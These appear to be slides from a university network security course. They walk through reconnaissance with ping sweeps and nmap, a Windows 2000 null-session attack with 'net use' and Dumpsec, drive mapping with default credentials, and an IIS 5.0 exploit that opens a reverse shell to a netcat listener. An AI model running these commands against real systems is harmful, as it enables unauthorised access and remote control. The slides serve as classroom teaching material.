ITP 457 Network Security Network Hacking 101

Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target 3. Research the discovered services for known vulnerabilities 4. Attempt to exploit the services 5. Utilize exploited services to gain additional privileges from the target 6. Reiterate steps 1-5 until goals are achieved

Network Hacking Methodology changes slightly because we are focused at this point on security from the inside 1. Gather information & map the network 2. Scan systems to see what’s alive 3. Determine services running 4. Attempt to penetrate the systems (if you want )

Gathering Information Upon connection to the network Check your IP – normally automatically assigned Windows – ipconfig Linux – ifconfig

Useful information from ipconfig Physical Address – your computer’s MAC address IPAddress – the ip address assigned to your computer Subnet Mask – the mask used to limit the number of computers on the network Default gateway – the computer that is used to connect to ip addresses outside of the network DHCP server – the computer that distributes IP addresses DNS servers – the computer that translates domain names to IP addresses IPconfig will identify between 1 and 3 computers without any scanning! (DHCP, DNS, Gateway)

“Knock-knock” Ping sweep Ping – ICMP “echo request” packets Will return if host is reachable (alive) Single command: ping host Host can be an IP or a domain name (e.g. We want to see all the hosts on our particular network Nmap (or Umit) nmap –sP

Ping sweep vs. port scanning Why not start with port scanning? Normally, ping scanning is benign and will not get you in trouble or caught Port scanning is almost always seen as malicious Limit the amount of time that you are port scanning by just looking at systems that are alive Also, there may be multiple subnets (multiple parts of the network), with some not being occupied. A ping sweep will quickly determine if a particular IP range is up or not.

Determine Running Systems Portscan the system that you want to break into Nmap will give a great report, including port service numbers  very useful for determining what is vulnerable Nmap will also try to tell you what operating system they are running Is it always reliable?

Breaking in Once you’ve discovered what services are running, you have to see which are vulnerable Determine which service you want to break, and find a vulnerability Places to look:

Null Session Hack One of the oldest tricks for Windows 2000 Will allow any hard disk mounted in the Win2k machine to be mapped as a network drive on the hacker’s machine Utilizes a vulnerability in the SMB shares First, determine the IP address of the Windows 2000 machine Example:

Null Session Hack Cont’d Establish the null session net use \\ipaddress\ipc$ “” /u:””\\ipaddress\ipc$ This command establishes the null session connection

Get the list of the usernames The program Dumpsec will give you the usernames and a whole lot more bin/download.pl?DumpAcl Go to select computer, and enter the computer address Go to “Dump Users as Column”, and it will give you options to add more information to the report

DumpSec

Map the network drive The command “net use” can also be used to map the victim’s machine as a network drive on your computer Caveat: you must know an adminstrator’s username and password In our case, the user “Bob” does not have a password – typical for insecure computers Another common one: username “Administrator” password “Password” The command: net use Z: \\ \c$ “password” /u:”username”\\ \c$

Golly!

We want more! We’ve established a remote drive connection, but we cannot run any commands We need either a remote shell (windows command prompt) or a remote window (VNC or terminal services) Shell is easier, and does not require a lot of bandwidth

Remember the portscanning IIS was installed Version 5.0 So let’s take a look and see what’s available Download IIS5hack from the exploit section You will also need netcat Use the command: nc –l –p 1111 Tells netcat to listen on port 1111

The hack! With netcat running, open another command prompt, and enter the command: iis5hack.exe victim-ip your-ip port-number example: iis5hack.exe This will open up a remote shell in the netcat window MAKE SURE THE WINDOWS FIREWALL IS TURNED OFF!!!

What have you learned? Methodology of a hack How to remotely map a drive from a windows 2000 machine How to hack IIS 5.0

Your lab Find another way to hack into a Windows 2000 machine Find a way to hack into the Windows XP SP0 machine Give me step-by-step instructions on how you did it. What sites did you go to? What tools did you use?